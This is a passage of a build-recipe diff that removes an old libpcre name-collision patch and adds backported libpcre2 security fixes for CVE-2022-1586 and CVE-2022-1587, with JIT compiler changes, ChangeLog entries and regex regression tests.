 HOMEPAGE = "http://www.infradead.org/~tgr/libnl/"
 SECTION = "libs/network"
 
diff --git a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch b/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
deleted file mode 100644
index 89b44f6aa6..0000000000
--- a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-Upstream-Status: Inappropriate [debian patch]
-
-This patch address a namespace collision with libc.
-
-Although there is no "#include <regex.h>" in the source file, at
-runtime, it's unintentionally linked to the libc version, the regcomp of
-libc is called instead the pcre one using pcre's data structure...
-that looks like a disaster.
-
-Can patch is from Debian (and Ubuntu 11.04alpha has it also).
-
-[sgw: added patch comment]
-Signed-off-by: Qing He <qing.he@intel.com>
-Signed-off-by: Saul Wold <sgw@linux.intel.com>
-
---- a/pcreposix.h	2010-05-17 00:17:23.000000000 +0800
-+++ b/pcreposix.h	2009-01-15 04:32:17.000000000 +0800
-@@ -133,14 +130,19 @@
- 
- /* The functions */
- 
--PCREPOSIX_EXP_DECL int regcomp(regex_t *, const char *, int);
--PCREPOSIX_EXP_DECL int regexec(const regex_t *, const char *, size_t,
-+PCREPOSIX_EXP_DECL int pcreposix_regcomp(regex_t *, const char *, int);
-+PCREPOSIX_EXP_DECL int pcreposix_regexec(const regex_t *, const char *, size_t,
-                      regmatch_t *, int);
--PCREPOSIX_EXP_DECL size_t regerror(int, const regex_t *, char *, size_t);
--PCREPOSIX_EXP_DECL void regfree(regex_t *);
-+PCREPOSIX_EXP_DECL size_t pcreposix_regerror(int, const regex_t *, char *, size_t);
-+PCREPOSIX_EXP_DECL void pcreposix_regfree(regex_t *);
- 
- #ifdef __cplusplus
- }   /* extern "C" */
- #endif
- 
-+#define regcomp pcreposix_regcomp
-+#define regexec pcreposix_regexec
-+#define regerror pcreposix_regerror
-+#define regfree pcreposix_regfree
-+
- #endif /* End of pcreposix.h */
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
new file mode 100644
index 0000000000..42ee417fe7
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
@@ -0,0 +1,30 @@
+From 5d1e62b0155292b994aa1c96d4ed8ce4346ef4c2 Mon Sep 17 00:00:00 2001
+From: Zoltan Herczeg <hzmester@freemail.hu>
+Date: Thu, 24 Mar 2022 05:34:42 +0000
+Subject: [PATCH] Fix incorrect value reading in JIT.
+
+CVE: CVE-2022-1586
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc3]
+
+(cherry picked from commit d4fa336fbcc388f89095b184ba6d99422cfc676c)
+Signed-off-by: Shinu Chandran <shinucha@cisco.com>
+---
+ src/pcre2_jit_compile.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 493c96d..fa57942 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7188,7 +7188,7 @@ while (*cc != XCL_END)
+     {
+     SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+     cc++;
+-    if (*cc == PT_CLIST && *cc == XCL_PROP)
++    if (*cc == PT_CLIST && cc[-1] == XCL_PROP)
+       {
+       other_cases = PRIV(ucd_caseless_sets) + cc[1];
+       while (*other_cases != NOTACHAR)
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
new file mode 100644
index 0000000000..fbbbc9ca77
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
@@ -0,0 +1,59 @@
+From 233c4248550d0c1d9bfee42198d5ee0855b7d413 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 13:52:39 +0530
+Subject: [PATCH] CVE-2022-1586
+
+Upstream-Status: Backport from https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ ChangeLog               | 3 +++
+ src/pcre2_jit_compile.c | 2 +-
+ src/pcre2_jit_test.c    | 4 ++++
+ 3 files changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index 0926c29..b5d72dc 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -1,6 +1,9 @@
+ Change Log for PCRE2
+ --------------------
+ 
++23. Fixed a unicode properrty matching issue in JIT. The character was not
++fully read in caseless matching.
++
+ 
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index f564127..5d43865 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7119,7 +7119,7 @@ while (*cc != XCL_END)
+     {
+     SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+     cc++;
+-    if (*cc == PT_CLIST)
++    if (*cc == PT_CLIST && *cc == XCL_PROP)
+       {
+       other_cases = PRIV(ucd_caseless_sets) + cc[1];
+       while (*other_cases != NOTACHAR)
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index a9b3880..9df87fd 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -408,6 +408,10 @@ static struct regression_test_case regression_test_cases[] = {
+ 	{ MUP, A, 0, 0 | F_PROPERTY, "[\xc3\xa2-\xc3\xa6\xc3\x81-\xc3\x84\xe2\x80\xa8-\xe2\x80\xa9\xe6\x92\xad\\p{Zs}]{2,}", "\xe2\x80\xa7\xe2\x80\xa9\xe6\x92\xad \xe6\x92\xae" },
+ 	{ MUP, A, 0, 0 | F_PROPERTY, "[\\P{L&}]{2}[^\xc2\x85-\xc2\x89\\p{Ll}\\p{Lu}]{2}", "\xc3\xa9\xe6\x92\xad.a\xe6\x92\xad|\xc2\x8a#" },
+ 	{ PCRE2_UCP, 0, 0, 0 | F_PROPERTY, "[a-b\\s]{2,5}[^a]", "AB  baaa" },
++	{ MUP, 0, 0, 0 | F_NOMATCH, "[^\\p{Hangul}\\p{Z}]", " " },
++	{ MUP, 0, 0, 0, "[\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++	{ MUP, 0, 0, 0, "[\\x{a92e}\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++	{ CMUP, 0, 0, 0, "[^S]\\B", "\xe2\x80\x8a" },
+ 
+ 	/* Possible empty brackets. */
+ 	{ MU, A, 0, 0, "(?:|ab||bc|a)+d", "abcxabcabd" },
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
new file mode 100644
index 0000000000..70f9f9f079
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
@@ -0,0 +1,660 @@
+From aa5aac0d209e3debf80fc2db924d9401fc50454b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 14:11:11 +0530
+Subject: [PATCH] CVE-2022-1587
+
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0]
+CVE: CVE-2022-1587
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ ChangeLog               |   3 +
+ src/pcre2_jit_compile.c | 290 ++++++++++++++++++++++++++--------------
+ src/pcre2_jit_test.c    |   1 +
+ 3 files changed, 194 insertions(+), 100 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index b5d72dc..de82de9 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -4,6 +4,9 @@ Change Log for PCRE2
+ 23. Fixed a unicode properrty matching issue in JIT. The character was not
+ fully read in caseless matching.
+ 
++24. Fixed an issue affecting recursions in JIT caused by duplicated data
++transfers.
++
+ 
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 5d43865..493c96d 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -407,6 +407,9 @@ typedef struct compiler_common {
+   /* Locals used by fast fail optimization. */
+   sljit_s32 fast_fail_start_ptr;
+   sljit_s32 fast_fail_end_ptr;
++  /* Variables used by recursive call generator. */
++  sljit_s32 recurse_bitset_size;
++  uint8_t *recurse_bitset;
+ 
+   /* Flipped and lower case tables. */
+   const sljit_u8 *fcc;
+@@ -2109,19 +2112,39 @@ for (i = 0; i < RECURSE_TMP_REG_COUNT; i++)
+ 
+ #undef RECURSE_TMP_REG_COUNT
+ 
++static BOOL recurse_check_bit(compiler_common *common, sljit_sw bit_index)
++{
++uint8_t *byte;
++uint8_t mask;
++
++SLJIT_ASSERT((bit_index & (sizeof(sljit_sw) - 1)) == 0);
++
++bit_index >>= SLJIT_WORD_SHIFT;
++
++mask = 1 << (bit_index & 0x7);
++byte = common->recurse_bitset + (bit_index >> 3);
++
++if (*byte & mask)
++  return FALSE;
++
++*byte |= mask;
++return TRUE;
++}
++
+ static int get_recurse_data_length(compiler_common *common, PCRE2_SPTR cc, PCRE2_SPTR ccend,
+   BOOL *needs_control_head, BOOL *has_quit, BOOL *has_accept)
+ {
+ int length = 1;
+-int size;
++int size, offset;
+ PCRE2_SPTR alternative;
+ BOOL quit_found = FALSE;
+ BOOL accept_found = FALSE;
+ BOOL setsom_found = FALSE;
+ BOOL setmark_found = FALSE;
+-BOOL capture_last_found = FALSE;
+ BOOL control_head_found = FALSE;
+ 
++memset(common->recurse_bitset, 0, common->recurse_bitset_size);
++
+ #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+ control_head_found = TRUE;
+@@ -2144,15 +2167,17 @@ while (cc < ccend)
+       setsom_found = TRUE;
+     if (common->mark_ptr != 0)
+       setmark_found = TRUE;
+-    if (common->capture_last_ptr != 0)
+-      capture_last_found = TRUE;
++    if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
++      length++;
+     cc += 1 + LINK_SIZE;
+     break;
+ 
+     case OP_KET:
+-    if (PRIVATE_DATA(cc) != 0)
++    offset = PRIVATE_DATA(cc);
++    if (offset != 0)
+       {
+-      length++;
++      if (recurse_check_bit(common, offset))
++        length++;
+       SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
+       cc += PRIVATE_DATA(cc + 1);
+       }
+@@ -2169,39 +2194,55 @@ while (cc < ccend)
+     case OP_SBRA:
+     case OP_SBRAPOS:
+     case OP_SCOND:
+-    length++;
+     SLJIT_ASSERT(PRIVATE_DATA(cc) != 0);
++    if (recurse_check_bit(common, PRIVATE_DATA(cc)))
++      length++;
+     cc += 1 + LINK_SIZE;
+     break;
+ 
+     case OP_CBRA:
+     case OP_SCBRA:
+-    length += 2;
+-    if (common->capture_last_ptr != 0)
+-      capture_last_found = TRUE;
+-    if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
++    offset = GET2(cc, 1 + LINK_SIZE);
++    if (recurse_check_bit(common, OVECTOR(offset << 1)))
++      {
++      SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
++      length += 2;
++      }
++    if (common->optimized_cbracket[offset] == 0 && recurse_check_bit(common, OVECTOR_PRIV(offset)))
++      length++;
++    if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+       length++;
+     cc += 1 + LINK_SIZE + IMM2_SIZE;
+     break;
+ 
+     case OP_CBRAPOS:
+     case OP_SCBRAPOS:
+-    length += 2 + 2;
+-    if (common->capture_last_ptr != 0)
+-      capture_last_found = TRUE;
++    offset = GET2(cc, 1 + LINK_SIZE);
++    if (recurse_check_bit(common, OVECTOR(offset << 1)))
++      {
++      SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
++      length += 2;
++      }
++    if (recurse_check_bit(common, OVECTOR_PRIV(offset)))
++      length++;
++    if (recurse_check_bit(common, PRIVATE_DATA(cc)))
++      length++;
++    if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
++      length++;
+     cc += 1 + LINK_SIZE + IMM2_SIZE;
+     break;
+ 
+     case OP_COND:
+     /* Might be a hidden SCOND. */
+     alternative = cc + GET(cc, 1);
+-    if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
++    if ((*alternative == OP_KETRMAX || *alternative == OP_KETRMIN) && recurse_check_bit(common, PRIVATE_DATA(cc)))
+       length++;
+     cc += 1 + LINK_SIZE;
+     break;
+ 
+     CASE_ITERATOR_PRIVATE_DATA_1
+-    if (PRIVATE_DATA(cc) != 0)
++    offset = PRIVATE_DATA(cc);
++    if (offset != 0 && recurse_check_bit(common, offset))
+       length++;
+     cc += 2;
+ #ifdef SUPPORT_UNICODE
+@@ -2210,8 +2251,12 @@ while (cc < ccend)
+     break;
+ 
+     CASE_ITERATOR_PRIVATE_DATA_2A
+-    if (PRIVATE_DATA(cc) != 0)
++    offset = PRIVATE_DATA(cc);
++    if (offset != 0 && recurse_check_bit(common, offset))
++      {
++      SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+       length += 2;
++      }
+     cc += 2;
+ #ifdef SUPPORT_UNICODE
+     if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2219,8 +2264,12 @@ while (cc < ccend)
+     break;
+ 
+     CASE_ITERATOR_PRIVATE_DATA_2B
+-    if (PRIVATE_DATA(cc) != 0)
++    offset = PRIVATE_DATA(cc);
++    if (offset != 0 && recurse_check_bit(common, offset))
++      {
++      SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+       length += 2;
++      }
+     cc += 2 + IMM2_SIZE;
+ #ifdef SUPPORT_UNICODE
+     if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2228,20 +2277,29 @@ while (cc < ccend)
+     break;
+ 
+     CASE_ITERATOR_TYPE_PRIVATE_DATA_1
+-    if (PRIVATE_DATA(cc) != 0)
++    offset = PRIVATE_DATA(cc);
++    if (offset != 0 && recurse_check_bit(common, offset))
+       length++;
+     cc += 1;
+     break;
+ 
+     CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
+-    if (PRIVATE_DATA(cc) != 0)
++    offset = PRIVATE_DATA(cc);
++    if (offset != 0 && recurse_check_bit(common, offset))
++      {
++      SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+       length += 2;
++      }
+     cc += 1;
+     break;
+ 
+     CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
+-    if (PRIVATE_DATA(cc) != 0)
++    offset = PRIVATE_DATA(cc);
++    if (offset != 0 && recurse_check_bit(common, offset))
++      {
++      SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+       length += 2;
++      }
+     cc += 1 + IMM2_SIZE;
+     break;
+ 
+@@ -2253,7 +2311,9 @@ while (cc < ccend)
+ #else
+     size = 1 + 32 / (int)sizeof(PCRE2_UCHAR);
+ #endif
+-    if (PRIVATE_DATA(cc) != 0)
++
++    offset = PRIVATE_DATA(cc);
++    if (offset != 0 && recurse_check_bit(common, offset))
+       length += get_class_iterator_size(cc + size);
+     cc += size;
+     break;
+@@ -2288,8 +2348,7 @@ while (cc < ccend)
+     case OP_THEN:
+     SLJIT_ASSERT(common->control_head_ptr != 0);
+     quit_found = TRUE;
+-    if (!control_head_found)
+-      control_head_found = TRUE;
++    control_head_found = TRUE;
+     cc++;
+     break;
+ 
+@@ -2309,8 +2368,6 @@ SLJIT_ASSERT(cc == ccend);
+ 
+ if (control_head_found)
+   length++;
+-if (capture_last_found)
+-  length++;
+ if (quit_found)
+   {
+   if (setsom_found)
+@@ -2343,14 +2400,12 @@ sljit_sw shared_srcw[3];
+ sljit_sw kept_shared_srcw[2];
+ int private_count, shared_count, kept_shared_count;
+ int from_sp, base_reg, offset, i;
+-BOOL setsom_found = FALSE;
+-BOOL setmark_found = FALSE;
+-BOOL capture_last_found = FALSE;
+-BOOL control_head_found = FALSE;
++
++memset(common->recurse_bitset, 0, common->recurse_bitset_size);
+ 
+ #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+-control_head_found = TRUE;
++recurse_check_bit(common, common->control_head_ptr);
+ #endif
+ 
+ switch (type)
+@@ -2438,11 +2493,10 @@ while (cc < ccend)
+     {
+     case OP_SET_SOM:
+     SLJIT_ASSERT(common->has_set_som);
+-    if (has_quit && !setsom_found)
++    if (has_quit && recurse_check_bit(common, OVECTOR(0)))
+       {
+       kept_shared_srcw[0] = OVECTOR(0);
+       kept_shared_count = 1;
+-      setsom_found = TRUE;
+       }
+     cc += 1;
+     break;
+@@ -2450,33 +2504,31 @@ while (cc < ccend)
+     case OP_RECURSE:
+     if (has_quit)
+       {
+-      if (common->has_set_som && !setsom_found)
++      if (common->has_set_som && recurse_check_bit(common, OVECTOR(0)))
+         {
+         kept_shared_srcw[0] = OVECTOR(0);
+         kept_shared_count = 1;
+-        setsom_found = TRUE;
+         }
+-      if (common->mark_ptr != 0 && !setmark_found)
++      if (common->mark_ptr != 0 && recurse_check_bit(common, common->mark_ptr))
+         {
+         kept_shared_srcw[kept_shared_count] = common->mark_ptr;
+         kept_shared_count++;
+-        setmark_found = TRUE;
+         }
+       }
+-    if (common->capture_last_ptr != 0 && !capture_last_found)
++    if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+       {
+       shared_srcw[0] = common->capture_last_ptr;
+       shared_count = 1;
+-      capture_last_found = TRUE;
+       }
+     cc += 1 + LINK_SIZE;
+     break;
+ 
+     case OP_KET:
+-    if (PRIVATE_DATA(cc) != 0)
++    private_srcw[0] = PRIVATE_DATA(cc);
++    if (private_srcw[0] != 0)
+       {
+-      private_count = 1;
+-      private_srcw[0] = PRIVATE_DATA(cc);
++      if (recurse_check_bit(common, private_srcw[0]))
++        private_count = 1;
+       SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
+       cc += PRIVATE_DATA(cc + 1);
+       }
+@@ -2493,50 +2545,66 @@ while (cc < ccend)
+     case OP_SBRA:
+     case OP_SBRAPOS:
+     case OP_SCOND:
+-    private_count = 1;
+     private_srcw[0] = PRIVATE_DATA(cc);
++    if (recurse_check_bit(common, private_srcw[0]))
++      private_count = 1;
+     cc += 1 + LINK_SIZE;
+     break;
+ 
+     case OP_CBRA:
+     case OP_SCBRA:
+-    offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
+-    shared_srcw[0] = OVECTOR(offset);
+-    shared_srcw[1] = OVECTOR(offset + 1);
+-    shared_count = 2;
++    offset = GET2(cc, 1 + LINK_SIZE);
++    shared_srcw[0] = OVECTOR(offset << 1);
++    if (recurse_check_bit(common, shared_srcw[0]))
++      {
++      shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
++      SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
++      shared_count = 2;
++      }
+ 
+-    if (common->capture_last_ptr != 0 && !capture_last_found)
++    if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+       {
+-      shared_srcw[2] = common->capture_last_ptr;
+-      shared_count = 3;
+-      capture_last_found = TRUE;
++      shared_srcw[shared_count] = common->capture_last_ptr;
++      shared_count++;
+       }
+ 
+-    if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
++    if (common->optimized_cbracket[offset] == 0)
+       {
+-      private_count = 1;
+-      private_srcw[0] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
++      private_srcw[0] = OVECTOR_PRIV(offset);
++      if (recurse_check_bit(common, private_srcw[0]))
++        private_count = 1;
+       }
++
+     cc += 1 + LINK_SIZE + IMM2_SIZE;
+     break;
+ 
+     case OP_CBRAPOS:
+     case OP_SCBRAPOS:
+-    offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
+-    shared_srcw[0] = OVECTOR(offset);
+-    shared_srcw[1] = OVECTOR(offset + 1);
+-    shared_count = 2;
++    offset = GET2(cc, 1 + LINK_SIZE);
++    shared_srcw[0] = OVECTOR(offset << 1);
++    if (recurse_check_bit(common, shared_srcw[0]))
++      {
++      shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
++      SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
++      shared_count = 2;
++      }
+ 
+-    if (common->capture_last_ptr != 0 && !capture_last_found)
++    if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+       {
+-      shared_srcw[2] = common->capture_last_ptr;
+-      shared_count = 3;
+-      capture_last_found = TRUE;
++      shared_srcw[shared_count] = common->capture_last_ptr;
++      shared_count++;
+       }
+ 
+-    private_count = 2;
+     private_srcw[0] = PRIVATE_DATA(cc);
+-    private_srcw[1] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
++    if (recurse_check_bit(common, private_srcw[0]))
++      private_count = 1;
++
++    offset = OVECTOR_PRIV(offset);
++    if (recurse_check_bit(common, offset))
++      {
++      private_srcw[private_count] = offset;
++      private_count++;
++      }
+     cc += 1 + LINK_SIZE + IMM2_SIZE;
+     break;
+ 
+@@ -2545,18 +2613,17 @@ while (cc < ccend)
+     alternative = cc + GET(cc, 1);
+     if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
+       {
+-      private_count = 1;
+       private_srcw[0] = PRIVATE_DATA(cc);
++      if (recurse_check_bit(common, private_srcw[0]))
++        private_count = 1;
+       }
+     cc += 1 + LINK_SIZE;
+     break;
+ 
+     CASE_ITERATOR_PRIVATE_DATA_1
+-    if (PRIVATE_DATA(cc))
+-      {
++    private_srcw[0] = PRIVATE_DATA(cc);
++    if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+       private_count = 1;
+-      private_srcw[0] = PRIVATE_DATA(cc);
+-      }
+     cc += 2;
+ #ifdef SUPPORT_UNICODE
+     if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2564,11 +2631,12 @@ while (cc < ccend)
+     break;
+ 
+     CASE_ITERATOR_PRIVATE_DATA_2A
+-    if (PRIVATE_DATA(cc))
++    private_srcw[0] = PRIVATE_DATA(cc);
++    if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+       {
+       private_count = 2;
+-      private_srcw[0] = PRIVATE_DATA(cc);
+-      private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
++      private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++      SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+       }
+     cc += 2;
+ #ifdef SUPPORT_UNICODE
+@@ -2577,11 +2645,12 @@ while (cc < ccend)
+     break;
+ 
+     CASE_ITERATOR_PRIVATE_DATA_2B
+-    if (PRIVATE_DATA(cc))
++    private_srcw[0] = PRIVATE_DATA(cc);
++    if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+       {
+       private_count = 2;
+-      private_srcw[0] = PRIVATE_DATA(cc);
+-      private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
++      private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++      SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+       }
+     cc += 2 + IMM2_SIZE;
+ #ifdef SUPPORT_UNICODE
+@@ -2590,30 +2659,30 @@ while (cc < ccend)
+     break;
+ 
+     CASE_ITERATOR_TYPE_PRIVATE_DATA_1
+-    if (PRIVATE_DATA(cc))
+-      {
++    private_srcw[0] = PRIVATE_DATA(cc);
++    if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+       private_count = 1;
+-      private_srcw[0] = PRIVATE_DATA(cc);
+-      }
+     cc += 1;
+     break;
+ 
+     CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
+-    if (PRIVATE_DATA(cc))
++    private_srcw[0] = PRIVATE_DATA(cc);
++    if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+       {
+       private_count = 2;
+-      private_srcw[0] = PRIVATE_DATA(cc);
+       private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++      SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+       }
+     cc += 1;
+     break;
+ 
+     CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
+-    if (PRIVATE_DATA(cc))
++    private_srcw[0] = PRIVATE_DATA(cc);
++    if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+       {
+       private_count = 2;
+-      private_srcw[0] = PRIVATE_DATA(cc);
+       private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++      SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+       }
+     cc += 1 + IMM2_SIZE;
+     break;
+@@ -2630,14 +2699,17 @@ while (cc < ccend)
+       switch(get_class_iterator_size(cc + i))
+         {
+         case 1:
+-        private_count = 1;
+         private_srcw[0] = PRIVATE_DATA(cc);
+         break;
+ 
+         case 2:
+-        private_count = 2;
+         private_srcw[0] = PRIVATE_DATA(cc);
+-        private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++        if (recurse_check_bit(common, private_srcw[0]))
++          {
++          private_count = 2;
++          private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++          SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
++          }
+         break;
+ 
+         default:
+@@ -2652,28 +2724,25 @@ while (cc < ccend)
+     case OP_PRUNE_ARG:
+     case OP_THEN_ARG:
+     SLJIT_ASSERT(common->mark_ptr != 0);
+-    if (has_quit && !setmark_found)
++    if (has_quit && recurse_check_bit(common, common->mark_ptr))
+       {
+       kept_shared_srcw[0] = common->mark_ptr;
+       kept_shared_count = 1;
+-      setmark_found = TRUE;
+       }
+-    if (common->control_head_ptr != 0 && !control_head_found)
++    if (common->control_head_ptr != 0 && recurse_check_bit(common, common->control_head_ptr))
+       {
+       shared_srcw[0] = common->control_head_ptr;
+       shared_count = 1;
+-      control_head_found = TRUE;
+       }
+     cc += 1 + 2 + cc[1];
+     break;
+ 
+     case OP_THEN:
+     SLJIT_ASSERT(common->control_head_ptr != 0);
+-    if (!control_head_found)
++    if (recurse_check_bit(common, common->control_head_ptr))
+       {
+       shared_srcw[0] = common->control_head_ptr;
+       shared_count = 1;
+-      control_head_found = TRUE;
+       }
+     cc++;
+     break;
+@@ -2681,7 +2750,7 @@ while (cc < ccend)
+     default:
+     cc = next_opcode(common, cc);
+     SLJIT_ASSERT(cc != NULL);
+-    break;
++    continue;
+     }
+ 
+   if (type != recurse_copy_shared_to_global && type != recurse_copy_kept_shared_to_global)
+@@ -13262,7 +13331,7 @@ SLJIT_ASSERT(!(common->req_char_ptr != 0 && common->start_used_ptr != 0));
+ common->cbra_ptr = OVECTOR_START + (re->top_bracket + 1) * 2 * sizeof(sljit_sw);
+ 
+ total_length = ccend - common->start;
+-common->private_data_ptrs = (sljit_s32 *)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
++common->private_data_ptrs = (sljit_s32*)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
+ if (!common->private_data_ptrs)
+   {
+   SLJIT_FREE(common->optimized_cbracket, allocator_data);
+@@ -13304,6 +13373,7 @@ if (!compiler)
+ common->compiler = compiler;
+ 
+ /* Main pcre_jit_exec entry. */
++LJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);
+ sljit_emit_enter(compiler, 0, SLJIT_ARG1(SW), 5, 5, 0, 0, private_data_size);
+ 
+ /* Register init. */
+@@ -13524,20 +13594,40 @@ common->fast_fail_end_ptr = 0;
+ common->currententry = common->entries;
+ common->local_quit_available = TRUE;
+ quit_label = common->quit_label;
+-while (common->currententry != NULL)
++if (common->currententry != NULL)
+   {
+-  /* Might add new entries. */
+-  compile_recurse(common);
+-  if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
++  /* A free bit for each private data. */
++  common->recurse_bitset_size = ((private_data_size / (int)sizeof(sljit_sw)) + 7) >> 3;
++  SLJIT_ASSERT(common->recurse_bitset_size > 0);
++  common->recurse_bitset = (sljit_u8*)SLJIT_MALLOC(common->recurse_bitset_size, allocator_data);;
++
++  if (common->recurse_bitset != NULL)
++    {
++    do
++      {
++      /* Might add new entries. */
++      compile_recurse(common);
++      if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
++        break;
++      flush_stubs(common);
++      common->currententry = common->currententry->next;
++      }
++    while (common->currententry != NULL);
++
++    SLJIT_FREE(common->recurse_bitset, allocator_data);
++    }
++
++  if (common->currententry != NULL)
+     {
++    /* The common->recurse_bitset has been freed. */
++    SLJIT_ASSERT(sljit_get_compiler_error(compiler) || common->recurse_bitset == NULL);
++
+     sljit_free_compiler(compiler);
+     SLJIT_FREE(common->optimized_cbracket, allocator_data);
+     SLJIT_FREE(common->private_data_ptrs, allocator_data);
+     PRIV(jit_free_rodata)(common->read_only_data_head, allocator_data);
+     return PCRE2_ERROR_NOMEMORY;
+     }
